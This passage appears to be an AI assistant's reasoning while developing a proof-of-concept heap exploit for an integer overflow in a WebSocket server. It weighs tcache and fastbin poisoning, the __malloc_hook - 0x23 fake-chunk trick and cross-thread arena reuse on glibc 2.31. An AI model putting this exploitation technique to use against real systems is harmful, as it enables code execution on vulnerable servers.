2. free(fsd.msg_data) at line 1713 → frees A → tcache[1] = {A → B_corrupted → __free_hook}
3. next_complete_frame returns -1
4. ws_establishconnection calls onclose, then closes the connection

All of this is on T1's thread. The poisoned tcache is T1's tcache. T1 exits, and its tcache is gone.
Hmm, but is the tcache_perthread_struct freed when the thread exits? Let me think... The tcache_perthread_struct is allocated via malloc() on thread creation (in __libc_malloc's tcache initialization). When the thread exits, the struct is NOT freed - it remains in the heap. But subsequent threads will create their OWN tcache structs.
So even though the poisoned chunks are in the heap, the new thread's tcache is fresh and won't see them.
Alternative 3: Use fastbins instead of tcache
If we fill up the tcache (7 entries) for the target bin, subsequent frees go to fastbins. Fastbins are part of the arena, not per-thread. If T1 and T2 share the same arena, then fastbin poisoning would work cross-thread.
But do T1 and T2 share the same arena? On glibc 2.31, by default, the main thread uses the main arena. Other threads may use the main arena or create their own. The number of arenas is limited (mp_.arena_max). For a simple program like our echo server with only 2 concurrent threads, they likely share the same arena.
But we saw the NON_MAIN_ARENA flag. This means the chunk was NOT in the main arena. So T1 used a non-main arena. If T2 also uses the same non-main arena, they share fastbins.
Hmm, this is getting very complex. Let me reconsider.
Actually, wait. Let me re-examine the GDB output from the previous session. The summary says:
```
0x7ffff0000c60, size 0x25 (32 | PREV_INUSE | NON_MAIN_ARENA)
```
The address 0x7ffff0000c60 is in the mmap region (high address), which is where thread arenas are allocated. So yes, it's in a thread arena.
But actually, looking more carefully: thread arenas on glibc 2.31 are created via mmap(), and each arena has its own heap segment. The arena pointer is stored in the thread-local thread_arena variable.
For our exploit, the question is: does connection 2's thread use the same arena as connection 1's thread?
Connection 1's thread exits before connection 2's thread starts. When a thread exits, its arena may be reused by a new thread. Specifically, on glibc 2.31, freed arenas are placed on a free list and reused.
So it's very likely that connection 2's thread reuses connection 1's arena! This means they share the same fastbins.
But we still have the tcache problem: connection 2 has a fresh tcache.
Alternative 4: Fill tcache + use fastbins
The plan:
This is more complex but feasible. Let me think about the details.
Actually, there's an even simpler approach.
Alternative 5: Same thread, use the echo on a different connection
The echo server uses ws_sendframe_bcast, which broadcasts to ALL connections on port 8080. This means if we have connection 1 and connection 2 both open, a message on connection 1 triggers a broadcast to ALL connections. But the malloc(response) and free(response) in ws_sendframe_internal happen on connection 1's thread.
What if we reverse the order? Connection 2 sends a legitimate message. The malloc(msg) happens on connection 2's thread. Then onmessage → ws_sendframe_bcast → malloc(response) on connection 2's thread. The broadcast sends to connection 1 (among others), but the malloc/free of the response buffer is on connection 2's thread.
Hmm, this doesn't help with cross-thread tcache.
Alternative 6: Single connection, use the echo path
Wait, I just realized something. The overflow happens during read_single_frame, which is called from next_complete_frame. The error path at line 1713 frees fsd.msg_data. But BEFORE the error path, the write loop returns -1 when next_byte() fails.
What if instead of having the write loop fail, we provide EXACTLY the overflow bytes we need and then close the connection? The write loop will write our overflow data and then fail on the next next_byte(). The key question is: how many bytes does the write loop write before failing?
The write loop iterates fsd->frame_length times. For f1sz=16, frame_length = 0xFFFFFFFFFFFFFFF5. The loop needs to read 0xFFFFFFFFFFFFFFF5 bytes from the socket. We provide some overflow bytes (say 48), then close. The loop writes 48 bytes of our data, then hits EOF.
Actually, wait. The write loop reads from the socket via next_byte(), which buffers up to 2048 bytes at a time. If we sent all our data in one TCP segment, next_byte() would first buffer up to 2048 bytes, then serve them one by one. After consuming the buffer, the next next_byte() call tries to recv() from the socket. If we closed the socket, recv() returns 0 (EOF) or -1 (error), and next_byte() returns -1.
So the write loop writes as many bytes as we send, then fails. The overflow is exactly the number of extra bytes we send (minus the frame 1 data that goes into the legitimate buffer space).
But the problem remains: after the loop fails, the function returns -1, free(msg_data) is called, and the thread exits. No more mallocs on this thread.
Unless... what if there's a way to make the server survive the error and continue processing?
Looking at the code:
```c
// Line 1710-1716
if (wfd->error)
{
    free(fsd.msg_data);
    wfd->msg = NULL;
    return (-1);
}
```
The error flag is set and the function returns -1. Back in ws_establishconnection:
```c
while (next_complete_frame(&wfd) >= 0)
{
    // process message
    free(wfd.msg);
}
// onclose, cleanup...
```
The while loop exits. No more processing. Thread exits.
Alternative 7: Overflow into the tcache_perthread_struct itself
What if we can overwrite the tcache_perthread_struct of the current thread? This struct is allocated at thread creation time and contains the counts and entry pointers for all tcache bins.
If we can locate the tcache_perthread_struct relative to our overflow buffer, we can directly modify tcache entries. This would let us set any tcache bin's entry pointer to __free_hook, and the NEXT malloc on that thread would return it.
But wait, the tcache_perthread_struct for thread T1 is allocated during the first malloc in T1. The first malloc in T1 happens during the handshake (the calloc(61) in get_handshake_accept). So the tcache struct is allocated early, possibly far from our exploit buffer.
Actually, on glibc 2.31, the tcache_perthread_struct is allocated with malloc(sizeof(tcache_perthread_struct)). The size is: TCACHE_MAX_BINS * sizeof(tcache_entry *) + TCACHE_MAX_BINS * sizeof(uint16_t) — the counts were widened from char to uint16_t in glibc 2.30. For 64 bins: 64 * 8 + 64 * 2 = 640 bytes. So malloc(640) → chunk size 0x290.
This is a large allocation that would be placed at the start of the thread arena's heap. Our exploit buffer comes later. So we'd need to overflow BACKWARDS, which we can't do.
Or... can we? Our overflow goes forward from the exploit buffer. If the tcache struct is before our buffer in memory, we can't reach it.
Actually, the tcache struct is the FIRST allocation in a new thread arena. It's allocated at the start of the heap segment. Our exploit buffer comes much later. So no, we can't overflow into it.
Alternative 8: Use the arena's bins directly (non-tcache path)
On glibc 2.31, the allocation path is:
The free path is:
For cross-thread exploitation:
So if we can:
This would work! But we need to be more careful with fastbin poisoning because glibc 2.31's fastbin allocator checks the size field:
```c
if (__builtin_expect(fastbin_index(chunksize(victim)) != idx, 0))
{
    errstr = "malloc(): memory corruption (fast)";
}
```
So the target address (where fd points) must have a valid size field at offset +8 that matches the fastbin index. __free_hook is in libc's .bss, which is likely zeroed. A zero size would make fastbin_index underflow to an invalid index. So we can't directly target __free_hook via fastbin.
But we can use the double-free technique or the fastbin -> smallbin technique. Or we could target a location where we can control the size field.
Actually, on glibc 2.31 with no protections (no PIE, no ASLR, no RELRO), we could target a location in the binary's .bss where we can control the size field. Or we could use the __malloc_hook approach (but __malloc_hook doesn't have a size check issue because it's checked differently).
Wait, actually __malloc_hook was only removed in glibc 2.34, so on 2.31 it's still available. And __malloc_hook is checked in __libc_malloc BEFORE tcache, fastbin, etc. So even if the allocation path goes through tcache/fastbin, __malloc_hook is called first.
Hmm, but __malloc_hook is called at the START of malloc, not when returning a specific chunk. So we can't use __malloc_hook directly for arbitrary write. We'd still need to redirect the allocation to __free_hook memory, then free() would trigger the hook.
Actually, __malloc_hook is called like this:
```c
void *(*hook) (size_t, const void *) = atomic_forced_read (__malloc_hook);
if (__builtin_expect (hook != NULL, 0))
{
    (*hook)(bytes, RETURN_ADDRESS (0));
    ...
}
```
So if we could set __malloc_hook to system, then malloc would call system(size). But we can't set __malloc_hook directly without an arbitrary write primitive.
OK, I think the cleanest approach for the PoC is:
Use fastbins with a fake chunk at a known address.
Here's the plan:
- free(msg_data) → this goes to tcache (still room? Let me check)

Hmm, if tcache already has 7 entries, free(msg_data) would go to fastbin instead of tcache. But msg_data is the exploit buffer itself, not the adjacent corrupted chunk. The corrupted adjacent chunk is already in the fastbin (we freed it before the overflow).
Wait, let me reconsider. The flow would be:
This is getting complicated. Let me step back and think about the SIMPLEST possible approach.
Simplest approach: Use __free_hook write on the SAME thread.
Can we somehow get a malloc on the same thread AFTER the overflow?
Looking at the code flow after the overflow:
1. read_single_frame returns -1
2. next_complete_frame: free(fsd.msg_data) → error, returns -1
3. ws_establishconnection: while loop exits, calls onclose
4. onclose in echo.c: ws_getaddress(client) → returns static buffer, no malloc
5. close_client → closes socket, no malloc

No mallocs after the overflow on the same thread.
What about BEFORE the error? After frame 1 (non-FIN) completes successfully, the do-while loop continues to frame 2 (the exploit frame). Between frames, there's no malloc.
What about control frames? Could we interleave a PING frame between frame 1 and frame 2? No, because frame 1 is non-FIN, so only CONT or control frames are expected.
Hmm, what about using the handle_ping_frame function? When a PING is received, the server responds. Let's look at that:
Actually, the server's response to a PING uses ws_sendframe → ws_sendframe_internal → malloc/free. But PINGs are control frames, and they're handled within the same next_complete_frame call. So if we send: [frame1 non-FIN] [PING] [frame2 FIN overflow], the server would:
The PONG response allocation happens between frame 1 and frame 2! But it's on the same thread, same tcache. The PONG response is a small allocation (depending on PING payload size), and it's freed before frame 2 starts.
This doesn't directly help with tcache poisoning, but it's an interesting allocation point.
Actually, let me reconsider the whole approach. Maybe instead of tcache poisoning, we should use a different technique.
Unsorted bin attack: Write a fake unsorted bin chunk whose bk pointer targets a location. When malloc processes the unsorted bin, it writes to bk->fd. This can corrupt arbitrary memory.
But this requires more complex heap shaping and understanding of bin management.
Alternative: Just use the crash itself as the PoC
For a security PoC, we don't necessarily need RIP control. We just need to demonstrate the heap corruption and show it's exploitable. But the user specifically asked for RIP control.
Let me reconsider the cross-thread approach more carefully.
Key question: Do connection 1 and connection 2's threads share the same arena?
On glibc 2.31, the arena allocation logic:
- malloc calls arena_get(), which tries to reuse an existing arena or create a new one

In our case:
So T2 should reuse A1! This means they share fastbins (but not tcache).
OK, let me plan the fastbin approach.
Fastbin poisoning plan:
Connection 1: Fill tcache + put chunk in fastbin
Connection 1: Overflow
Connection 1: Thread exits
- free(msg_data) → goes to tcache (if not full) or fastbin

Connection 2: Trigger
But fastbin size check: The corrupted fd target must have *(target+8) == 0x30 (for 48-byte fastbin). Where can we find this?
On glibc 2.31 with no protections:
- __free_hook is at a known address. __free_hook + 8 is... whatever is after __free_hook in memory.
- __free_hook is a single `void (*volatile __free_hook)(void *, const void *)` variable, 8 bytes. The next variable in .bss might have any value.

Hmm, we need a location where:
One common trick: use the __malloc_hook area. On glibc 2.31, __malloc_hook - 0x10 + 0x8 = __malloc_hook - 0x8. If we can find what's at __malloc_hook - 8, and if it happens to be 0x30... unlikely.
Another trick: use __free_hook - 8 as the fake chunk start. Then *(__free_hook - 8 + 8) = *__free_hook = 0 (initially NULL). 0 is not 0x30. Doesn't work.
Actually, on glibc 2.31, the common trick for fastbin-to-__free_hook is:
- use __free_hook - 0x10 as the fake chunk address
- the size field lands at __free_hook - 0x10 + 8 = __free_hook - 8
- what's at __free_hook - 8? It depends on the binary layout

Let me check: __free_hook = 0x7ffff7f9de48. So __free_hook - 8 = 0x7ffff7f9de40. What's there? We'd need to check in GDB. It could be part of another variable or padding.
Actually, in glibc 2.31, there's a well-known trick: the value at __free_hook - 8 is typically 0x0 or some other value that doesn't match 0x30. But there's another technique: overwrite __malloc_hook instead.
For __malloc_hook:

- __malloc_hook = 0x7ffff7f9bb70 (from our GDB output)
- __malloc_hook - 8 = 0x7ffff7f9bb68

Hmm, neither works directly. We'd need to find a "magic" address where offset +8 contains 0x30.
But wait, there's a classic technique: the 0x7f trick. On glibc 2.31, if we look near __malloc_hook, there's often a 0x7f byte sequence that can serve as a fake size. Specifically, __malloc_hook is preceded by the _IO_wide_data_2 vtable pointer or similar, and the alignment gives us a size of 0x7f.
Let me check: __malloc_hook = 0x7ffff7f9bb70. Let's look at 0x7ffff7f9bb70 - 0x8 = 0x7ffff7f9bb68 and nearby. On many glibc 2.31 builds, the region before __malloc_hook contains a value like 0x00000000000000ff or similar. We'd need to check.
Actually, the well-known address for this trick is __malloc_hook - 0x23:

- fake chunk at __malloc_hook - 0x23
- size field at __malloc_hook - 0x23 + 0x8 = __malloc_hook - 0x1b
- on typical builds, the qword at __malloc_hook - 0x1b reads as 0x000000000000007f (the 0x7f byte is the misaligned top byte of an adjacent libc pointer)

This is the classic __malloc_hook - 0x23 fastbin attack. The fake chunk size is 0x7f; after the flag bits are masked off, fastbin_index(0x78) = 5, the same index as a genuine 0x70 chunk.
So the plan changes:
__malloc_hook - 0x23__malloc_hook - 0x23system or another function address over __malloc_hook__malloc_hook → RIP controlBut wait, our exploit buffer size is determined by frame 1's payload. To make it a 0x70 chunk, frame 1 payload needs to be in the range that produces request2size(X) = 0x70. That's 0x61 to 0x70 - 1 (97 to 111 bytes). Let me verify: request2size(97) = (97 + 8 + 15) & ~15 = 120 & ~15 = 112 = 0x70. Yes, frame 1 payload of 97-111 bytes gives a 0x70 chunk.
Then the echo response for a 97-byte message: malloc(2 + 97 + 1) = malloc(100) → request2size(100) = (100+8+15)&~15 = 123&~15 = 112 = 0x70. Same bin!
OK, this is getting complex but feasible. Let me think about whether there's a simpler approach.
Actually, you know what? Let me reconsider the tcache approach. The key issue was that tcache is per-thread. But what if connection 1 and connection 2 are served by the SAME thread?
In wsServer, each connection gets its own thread (ws_establishconnection runs in a pthread). Connection 1 is in thread T1, connection 2 is in thread T2. They are different threads.
But what if we DON'T close connection 1? If we keep connection 1 open and just let the server error out on the overflow, the thread T1 exits. Then we open connection 2, which spawns thread T2.
Can we have connection 2 served by the SAME thread? No, because wsServer creates a new thread per connection.
OK wait, I just realized something. Let me re-read the code more carefully:
static void *ws_establishconnection(void *vclient)
Each connection spawns a new thread. After connection 1's thread exits, connection 2's thread starts. They are different threads with different tcache.
So for cross-thread exploitation, we MUST use either:
Let me go with the fastbin approach, specifically the __malloc_hook - 0x23 trick.
Wait, actually there's another option. What if the overflow happens on connection 1, and connection 1 DOESN'T error out? Could we make the overflow NOT trigger the error path?
Looking at the code:
```c
for (i = 0; i < fsd->frame_length; i++, (*msg_idx)++)
{
    cur_byte = next_byte(wfd);
    if (cur_byte == -1)
        return (-1);
    msg[*msg_idx] = cur_byte ^ masks[i % 4];
}
```
The loop runs fsd->frame_length iterations. If we close the socket, next_byte() returns -1, and we exit. But fsd->frame_length is huge, so we can't provide all the bytes.
What if we make fsd->frame_length small but still overflow? For that, we need f1sz + frame_length to wrap to a small value. The only way is for frame_length to be near 2^64. So it's always huge.
Unless... what if we can use a different entry point? What about multiple continuation frames?
Frame 1: non-FIN, payload size A
Frame 2: non-FIN continuation, payload size B
Frame 3: FIN continuation, payload size C (huge, wrapping)
The overflow happens on frame 3. But the write loop for frame 3 still reads C bytes. Same problem.
OK, I think the cross-thread fastbin approach is the way to go. Let me plan it properly.
Actually, wait. Let me reconsider one more time.
What about the __free_hook value at offset -8?
On glibc 2.31 (Ubuntu 20.04), let me check what's at __free_hook - 8. If it happens to be 0x30 or a value with the right fastbin index, we could use a direct __free_hook write.
From the GDB output: __free_hook = 0x7ffff7f9de48. So we need to check *(0x7ffff7f9de40). In a typical glibc 2.31 build, this might be 0 or some other value. Without checking in GDB, we can't be sure.
The __malloc_hook - 0x23 trick is well-known and reliable. Let me use that.
Fastbin attack plan using __malloc_hook:
Phase 1: Shape the heap on connection 1
Send shaping messages to fill tcache for 0x70-bin and place a chunk in fastbin:
Let me recalculate the tcache index: csize2tidx(0x70) = (0x70 - 0x20 + 0x10 - 1) / 0x10 = 5.
So tcache[5] for 0x70 chunks. Max capacity is 7.
Need 8 frees of 0x70 chunks to fill tcache + put one in fastbin.
The 8th free goes to the arena's fastbin for 0x70 chunks.
Phase 2: Exploit on connection 1
If tcache has 7 entries, malloc(97) gets from tcache. We need the exploit buffer to be adjacent to the fastbin chunk.
Let me think about the layout more carefully.
Actually, the shaping phase frees chunks in a specific order. The last few entries in tcache come from specific positions on the heap. When we then malloc for the exploit buffer, we get the most recently freed chunk (LIFO). Then the echo response gets another from tcache. Then they're both freed again.
This is getting very complicated. The heap layout depends on the exact sequence of mallocs and frees, which includes:
To make this tractable, we should do the shaping to establish a predictable layout, then have the exploit buffer and its adjacent fastbin chunk in known positions.
Let me think about a cleaner shaping sequence:
After handshake:

- tcache[1] = {accept(48)}, tcache[2] = {str(64)}, tcache[7] = {response(144)}
- Heap: [freed str(64)] [freed accept(48)] [freed response(144)] [top]
Send 8 shaping messages of size 97 (0x70 chunks):
First few will use tcache (if available) or top. But wait, tcache[5] is empty after handshake. So:
Shaping msg 1:
Shaping msg 2:
Wait, msg = M1 (reused), echo = E1 (reused). Then free(E1) → tcache[5] = {E1}, count=1. free(M1) → tcache[5] = {M1 → E1}, count=2.
This is circular - we're just reusing the same two chunks. We'll never fill tcache this way!
The problem is that each round only has 2 allocations and 2 frees. The freed chunks go back to tcache and are immediately reused.
To fill tcache, we need to accumulate more free chunks. But the echo server always frees after allocating, so the count stays at 2.
Unless... we can use a different allocation pattern. What if some allocations fail to free (e.g., due to error)?
Actually, what about the handshake? It allocates and frees chunks too. But those are different sizes (64, 48, 144), not 0x70.
What if we use the ws_sendframe_bcast behavior? The broadcast sends to ALL connected clients. If we have multiple connections, the response is allocated once and freed once. So the count doesn't increase.
Hmm, this is a fundamental problem. With the echo server, each round-trip produces exactly 2 frees (msg + response) and 2 allocs. The tcache count oscillates between 0 and 2.
To fill tcache, we'd need 7 free chunks without corresponding mallocs. But the echo server's architecture doesn't allow this.
Wait, what about the connection close path? When connection 1 closes, the server calls free(msg_data) on the error path. But that's only 1 extra free.
What if we open MULTIPLE connections and have them all close? Each connection's handshake adds some frees, and each connection's error adds a free.
Let me think... If we open 4 connections and each one does a handshake (3 allocs, 3 frees: 64, 48, 144), then closes normally, we don't get any 0x70 frees.
But if each connection sends messages before closing, the frees happen on each thread's tcache. Different threads, different tcaches.
Hmm. We can't fill tcache beyond 2 entries for a given size using the echo server's normal path on a single connection.
OK, so the fastbin approach won't work because we can't fill tcache.
Let me reconsider...
Back to basics: Can we use tcache poisoning cross-thread?
The issue is that each thread has its own tcache. But what if we can make the SAME thread do the overflow AND the subsequent malloc?
The only way is to do everything on one connection. But after the overflow, the thread errors out.
What about using the validate_utf8_txt path?
After read_single_frame returns, there's:
switch (fsd.opcode) {
case WS_FR_OP_CONT:
case WS_FR_OP_TXT:
validate_utf8_txt(wfd, &fsd);
break;But this is for UTF-8 validation, not memory allocation. And the overflow uses binary frames (opcode 2), which skip UTF-8 validation.
What about the PING/PONG path?
In next_complete_frame, after processing a PING, the server sends a PONG:
```c
case WS_FR_OP_PING:
    if (handle_ping_frame(wfd, &fsd) < 0)
        goto done;
    break;
```
But PING is a control frame, handled separately from data frames. Can we interleave PINGs with our exploit frames?
Looking at the code, the do-while loop processes frames until FIN. Between frame 1 (non-FIN) and frame 2 (FIN continuation), we can't insert a PING because the server expects only CONT or control frames. Wait:
```c
if ((wfd->frame_type == -1 && fsd.opcode == WS_FR_OP_CONT) ||
    (wfd->frame_type != -1 && !is_control_frame(fsd.opcode) &&
     fsd.opcode != WS_FR_OP_CONT))
{
    wfd->error = 1;
    break;
}
```
This says: error if (no previous data frame AND opcode is CONT) OR (previous data frame AND opcode is non-control AND non-CONT). So control frames (PING, PONG, CLOSE) ARE allowed between data frames!
So the sequence [frame1 non-FIN BIN] [PING] [frame2 FIN CONT overflow] is valid! And the PING handler allocates and frees memory for the PONG response!
Let me check handle_ping_frame:
Let me look at this function.
Actually, this changes everything! If we can do a PING between the two exploit frames, the PONG response allocation/free happens on the SAME thread. And if we can make the PONG response come from a specific chunk...
But wait, the PONG response is allocated AND freed before frame 2 starts. So the tcache state after PONG is the same as before PONG (assuming the same sizes).
Unless... the PONG response is a DIFFERENT size. If we use a PING with a specific payload size, the PONG response allocation will be a different size, using a different tcache bin. That doesn't help directly.
Hmm. Let me think about this differently.
The key insight: On the SAME thread, we can:
The poisoned tcache has: {exploit_buffer → corrupted_chunk → __free_hook} (or similar). But this tcache dies with the thread.
Can we make the poisoned chunk persist in the arena?
If we fill tcache first, the free(exploit_buffer) goes to fastbin instead. Fastbin chunks are in the arena, which persists across threads.
But we can't fill tcache on a single connection...
Wait, what about multiple concurrent connections?
What if we open connections 1 AND 2 simultaneously? They run in different threads but might share the same arena. If they share the arena:
But connection 1 can't affect connection 2's tcache.
However, if connection 1 fills its tcache AND the arena's fastbin, then connection 2 might be able to use the fastbin.
But we can't fill tcache on connection 1 either (max 2 entries per bin with echo).
New idea: Use the handshake allocations to fill tcache
Each connection's handshake does:
- calloc(1, 61) → 64-byte chunk → freed to tcache[2]
- base64_encode → malloc(31) → 48-byte chunk → freed to tcache[1]
- malloc(130) → 144-byte chunk → freed to tcache[7]

If we open connections rapidly, each thread gets its own tcache. But each thread only has 1 entry per bin.
Wait, but threads exit and their tcaches are destroyed. The chunks are in the arena's heap but not in any tcache.
Actually, when a thread exits and its tcache is not explicitly freed, the tcache entries are "lost" - they're in the heap but not in any free list. This is a memory leak. Subsequent threads can't access them through tcache.
But the chunks ARE freed (the tcache entries were properly freed into tcache). When the thread exits, the tcache_perthread_struct is also "freed" in the sense that the memory is there but not tracked.
Hmm, actually, on glibc 2.31, the tcache_perthread_struct is allocated on the heap but is never explicitly freed. When the thread exits, the struct's memory is still there. The chunks that were in tcache are... well, they were in the tcache linked list. When the thread exits, those entries are lost. The heap space is "freed" in the sense that tcache_put already happened, but the next thread won't see them.
Wait, I think I'm overcomplicating this. Let me look at what actually happens:
Thread T1 starts, first malloc initializes tcache (allocates tcache_perthread_struct from heap)
T1 does handshake: allocates str(64), accept(48), response(144), frees them to tcache
T1 sends shaping messages: more allocs/frees to tcache
T1 does exploit: overflow, then free(msg) to tcache, then exit
Thread T2 starts, first malloc initializes ITS OWN tcache (allocates a NEW tcache_perthread_struct from heap)
T2's tcache is empty. Its mallocs go to fastbins/bins/top.
So the poisoned chunks in T1's tcache are effectively "leaked" - they're marked as free in the tcache linked list, but T2 can't see them. They're also not in the arena's bins. They're in limbo.
This means the tcache poisoning approach is fundamentally broken for cross-thread exploitation, at least with the current architecture.
Let me reconsider the fastbin approach with the tcache leak problem in mind.
After T1 exits, the chunks in T1's tcache are leaked. This reduces the number of free chunks available in the heap for T2. But chunks that were freed to fastbins (beyond tcache capacity) ARE accessible to T2.
So the plan is:
This is the fundamental problem. We can't get 7 entries in tcache on a single connection.
Alternative: Use a different target that doesn't require tcache poisoning or fastbin poisoning.
What about overwriting a function pointer in the ws_connection struct? The struct is in BSS (client_socks array). But our overflow is on the heap, not in BSS. We can't reach BSS from the heap.
What about overwriting the onclose or onmessage function pointers in the ws_server struct? Again, these are in the ws_connection struct in BSS.
What about overwriting the vtable of a FILE struct (stdout)? stdout is a FILE* in libc. If we can overwrite its vtable, we can redirect execution when printf is called. But stdout is in libc's data segment, far from our heap buffer.
Alternative: Use the __malloc_hook with a different technique.
What if we can write to __malloc_hook directly through the overflow? If __malloc_hook is adjacent to something on the heap... No, it's in libc's BSS, not on the heap.
Alternative: Use __free_hook with a different technique.
Same issue - __free_hook is in libc's BSS.
OK, I think the ONLY viable approach for cross-thread exploitation with the echo server is to somehow get a chunk into the arena-level free lists (fastbins or bins) that has a corrupted fd/bk.
The challenge is getting chunks into those lists. tcache has priority, and tcache never fills beyond 2 entries on a single connection.
Wait! What about multiple connections' handshakes?
If we rapidly open and close connections, each connection's handshake does frees on that thread's tcache. When the thread exits, the tcache entries are "lost". But what if we can somehow get the thread to exit BEFORE freeing to tcache?
Actually, the handshake frees happen during the handshake, before the thread exits. So they always go to the current thread's tcache.
Another idea: What if we use a larger overflow to corrupt the tcache_perthread_struct of a DIFFERENT thread?
Each thread's tcache_perthread_struct is allocated on the heap. If we can locate it and overwrite it with our overflow, we can set arbitrary tcache entries for that thread.
But the tcache_perthread_struct for T2 is allocated when T2 does its first malloc. This happens AFTER T1 has exited. So at the time of our overflow, T2's tcache doesn't exist yet.
What about T1's own tcache_perthread_struct? If we can overwrite T1's tcache entries, we could set a tcache[1] entry to __free_hook. Then the NEXT malloc on T1 for a 48-byte chunk would return __free_hook.
But after the overflow, the only remaining mallocs on T1 are... none. The thread exits.
Unless we can trigger a malloc on T1 after the overflow. But the code path doesn't allow this.
OK, I think I need to consider a completely different approach.
Approach: Unsorted bin attack
Instead of corrupting a single chunk's fd/bk, we can corrupt an unsorted bin chunk to trigger a write to an arbitrary address. This doesn't require the target to have a specific size value.
But getting a chunk into the unsorted bin requires:
For 0x90+ chunks, frees go to unsorted bin (after tcache). If we can fill tcache for that bin and then free a large chunk, it goes to unsorted bin.
But we still have the tcache-filling problem.
Approach: Use the echo's onclose callback
The onclose callback in echo.c does:

```c
void onclose(ws_cli_conn_t client)
{
    char *cli;
    cli = ws_getaddress(client);
    printf("Connection closed, addr: %s\n", cli);
}
```

ws_getaddress returns a pointer to client->ip, which is a static buffer. No malloc. printf may or may not allocate.
After onclose, the code does:

```c
clse_thrd = client->close_thrd;
if (clse_thrd) { ... }
close_client(client, 1);
```

No mallocs here.
Approach: Overflow into stdout's FILE buffer
When printf is first called, it allocates a buffer for stdout (if not setvbuf'd). This buffer is typically 8192 bytes. If the printf in onopen/onmessage allocates this buffer, it's a large chunk on the heap.
But this is a one-time allocation. It won't be freed.
OK, I'm going in circles. Let me think about this from a completely different angle.
What if we can make the server call free() on a controlled pointer?
The error path does free(fsd.msg_data). After the overflow, msg_data points to our buffer. But we can't control WHERE the free happens.
What about the ws_sendframe_bcast in onmessage? It allocates a response and frees it. But onmessage is only called for COMPLETE messages (FIN=1). Our exploit message is split into frame 1 (non-FIN) and frame 2 (FIN with overflow). The onmessage callback is only called after the complete message is received. But frame 2's write loop errors out, so the message is never complete. onmessage is never called.
What about a second message AFTER the exploit?
After the exploit frames error out, the while loop in ws_establishconnection exits. No more messages.
But what if we send a COMPLETE, valid message BEFORE the exploit frames? That message would be processed normally (onmessage called, echo sent, msg freed). Then the exploit frames start.
This is already what the shaping phase does! The shaping messages are complete, valid messages. Each one triggers:
These mallocs/frees happen BEFORE the exploit. They shape the heap.
The problem is that after the exploit, there's nothing more on this thread.
What if the exploit is NOT the last thing on the thread?
What if after the exploit, we send more data that the server processes? But the error flag is set, and the while loop exits.
What if we send the exploit data in a way that doesn't trigger the error? We'd need the write loop to complete normally. But the frame length is ~2^64, so it can't complete.
What if we use a different overflow length?
Can we make frame_length wrap to a SMALL but non-zero value that we CAN provide?
For frame_size to pass the check: frame_size = f1sz + frame_length ≤ MAX_FRAME_LENGTH = 16MB.
If f1sz + frame_length doesn't wrap (i.e., the sum is genuinely small), then we'd need frame_length to be small. But then realloc(msg, msg_idx + frame_length + 1) would be a legitimate allocation, and the write loop would write frame_length bytes normally. No overflow.
The overflow requires the sum to wrap. And wrapping requires frame_length to be near 2^64. So the write loop is always going to try to read ~2^64 bytes.
What about the frame_size overflow affecting a DIFFERENT code path?
Looking at the code, frame_size is used:
- in the `*frame_size > MAX_FRAME_LENGTH` check
- in `fsd.is_fin && *frame_size > 0` for FIN handling

What if *frame_size wraps to exactly 0? Then at line 1531, fsd.is_fin && *frame_size > 0 would be false, and the FIN handling would be skipped. But the FIN flag is set, so the do-while loop exits.
After the loop exits (because is_fin), the code at line 1710 checks for errors. If no error was set, it returns success with wfd.msg = fsd.msg_data. Then onmessage is called!
So if we can:
- send frame 1 (non-FIN) with f1sz bytes of payload, then
- send frame 2 (FIN) advertising frame_length = 2^64 - f1sz,

then *frame_size = f1sz + (2^64 - f1sz) = 0 (mod 2^64). And:
- `*frame_size > MAX_FRAME_LENGTH` → 0 > 16MB → false → passes!
- realloc(msg, f1sz + (2^64 - f1sz) + 1) = realloc(msg, 1) → tiny, same pointer
- the write loop still tries to read (2^64 - f1sz) bytes → huge → hits EOF → returns -1

Still the same problem. The write loop tries to read too many bytes.
But wait, what if frame_length = 0? Then the check at line 1501 if (fsd->frame_length > 0) is false, so the realloc and write loop are SKIPPED! And *frame_size += 0 = f1sz. If f1sz ≤ MAX_FRAME_LENGTH, the check passes.
But then there's no overflow either. frame_length=0 means nothing is written.
What about frame_length = 1? Then *frame_size = f1sz + 1. Realloc to f1sz + 1 + 1 = f1sz + 2. Write loop writes 1 byte. No overflow.
I keep coming back to the same conclusion: for an overflow, we need a huge frame_length, which means the write loop runs for ~2^64 iterations, which always fails.
Unless we can make the write loop succeed by providing data?
The write loop reads bytes from the socket. If we provide all the data the loop needs, it completes successfully. But frame_length ≈ 2^64, so we'd need to send ~2^64 bytes. Not possible.
What about integer overflow in the loop counter?
The loop is: for (i = 0; i < fsd->frame_length; i++, (*msg_idx)++)
i is uint64_t. After i reaches 2^64 - 1, it wraps to 0. Then 0 < fsd->frame_length is true, so the loop continues. It would wrap around again and again... effectively an infinite loop.
Actually no, i goes 0, 1, 2, ..., 2^64-1, then wraps to 0. At that point, 0 < frame_length is true (frame_length is huge), so it continues. But msg_idx has also been incrementing: *msg_idx goes from f1sz to f1sz + frame_length, which wraps to f1sz + small_value. Then msg[*msg_idx] writes to a specific offset.
But the loop keeps running! It's an infinite loop unless next_byte() returns -1.
OK, I think I need to accept that the cross-thread tcache issue is fundamental and work around it.
Revised plan: Single-connection approach with creative heap manipulation
The key realization: we need the allocation AND free that triggers the exploit to happen on the SAME thread. The only allocations/frees after the overflow on the same thread are:
- free(fsd.msg_data) at line 1713
- close_client (no malloc/free)

So there's only ONE free after the overflow. We need that free to trigger the exploit.
Approach: Overwrite the tcache_perthread_struct counts
T1's tcache_perthread_struct is on the heap. If our overflow can reach it, we can modify the counts array to make tcache think a certain bin has entries when it doesn't. This could cause tcache_get to return a chunk from a corrupted entries[] pointer.
But the entries[] pointer for a bin that was never used would be NULL. We'd need to set BOTH the count AND the entries pointer.
The tcache_perthread_struct layout (glibc 2.31; counts widened from char to uint16_t in 2.30):

```c
typedef struct tcache_perthread_struct {
    uint16_t counts[TCACHE_MAX_BINS];       /* 64 * 2 = 128 bytes */
    tcache_entry *entries[TCACHE_MAX_BINS]; /* 64 * 8 = 512 bytes */
} tcache_perthread_struct;
```

Total: 640 bytes on 2.31 (576 on pre-2.30, where counts was a char array). The counts are at offset 0, entries at offset 128.
If we can overwrite entries[X] with __free_hook and counts[X] with a non-zero value, then malloc(size_for_bin_X) would return __free_hook.
But the tcache_perthread_struct is typically the FIRST allocation on the heap (for a thread arena). Our overflow buffer comes later. The struct is BEFORE our buffer, and we can only overflow FORWARD. So we can't reach it.
Unless... the tcache_perthread_struct is after our buffer. Let me think about when it's allocated.
